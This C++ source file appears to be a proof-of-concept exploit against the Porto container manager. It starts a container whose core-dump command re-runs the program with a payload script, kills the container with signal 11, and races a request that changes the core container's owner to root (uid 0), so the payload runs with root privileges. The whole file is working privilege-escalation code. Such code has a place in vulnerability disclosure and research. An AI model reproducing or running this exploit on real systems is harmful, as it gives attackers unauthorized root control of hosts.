#include <util/generic/string.h>
#include <util/folder/path.h>
#include <util/datetime/base.h>
#include <util/system/shellcommand.h>
#include <util/string/subst.h>
#include <library/cpp/getopt/last_getopt.h>
#include <junk/buglloc/pocs/porto/new_porto_api/api/libporto.hpp>
#include <library/cpp/threading/future/async.h>


void portoCall(Porto::TPortoApi &api, const Porto::TPortoRequest &req) {
    Porto::TPortoResponse resp;
    Cerr << "Call: " << req.ShortDebugString() << Endl;
    if (api.Call(req, resp, 0) != Porto::EError::Success) {
        ythrow yexception() << api.GetLastError() << Endl;
    }
}


int main(int argc, char **argv) {
    using namespace NLastGetopt;
    TOpts opts = TOpts::Default();

    TString command;
    opts.AddLongOption("command", "target command")
            .DefaultValue("/payload.sh")
            .StoreResult(&command);

    opts.AddLongOption("execute", "target command")
            .NoArgument();

    TOptsParseResult args(&opts, argc, argv);

    if (args.Has("execute")) {
        TShellCommand cmd("bash", {"-c", command});
        cmd.Run().Wait();
        return 0;
    }

    auto containerName = "test-" + ToString(Now().TimeT());
    {
        // start junk container with custom core_command
        Porto::TPortoApi api;
        Porto::TPortoRequest req;
        auto newContainerRequest = req.mutable_createfromspec();
        newContainerRequest->set_start(true);

        auto container = newContainerRequest->mutable_container();
        container->set_isolate(false);
        container->set_name(containerName);
        container->set_command("sleep 3600");
        container->mutable_ulimit()->mutable_ulimit()->Add()->set_type("core");
        Y_UNUSED(SubstGlobal(command, "'", "'\\''"));
        container->set_core_command(
                TFsPath("/proc/self/exe").ReadLink().GetPath() +
                " --command='" + command + "'" +
                " --execute"
        );
        portoCall(api, req);
    }

    // kill it!
    TThreadPool taskPool{TThreadPool::TParams().SetBlocking(false).SetCatching(false)};
    taskPool.Start(1);
    auto startFuture = NThreading::Async([containerName] {
        usleep(10000);
        Porto::TPortoApi api;
        if (api.Kill(containerName, 11) != Porto::EError::Success) {
            Cerr << "failed to kill container: " << api.GetLastError() << Endl;
        }
    }, taskPool);

    {
        Porto::TPortoApi api;
        Porto::TPortoRequest req;
        auto setContainer = req.mutable_updatefromspec();
        auto container = setContainer->mutable_container();

        auto ownerCred = container->mutable_owner_cred();
        ownerCred->set_uid(0);
        ownerCred->set_gid(0);

        Porto::TListContainersRequest listReq;
        listReq.mutable_field_options()->Addproperties("absolute_name");
        listReq.mutable_filters()->Add()->set_name(containerName + "/core-***");
        TVector<Porto::TContainer> coreContainers;

        for (;;) {
            try {
                // wait core container
                auto err = api.ListContainersBy(listReq, coreContainers);
                if (err != Porto::EError::Success || coreContainers.empty()) {
                    continue;
                }

                // call set UpdateFromSpec to change owner to root user
                container->set_name(coreContainers[0].Getstatus().absolute_name());
                portoCall(api, req);
                break;
            } catch (...) {
                //
            }
        }
    }

    startFuture.Wait();
    return 0;
}
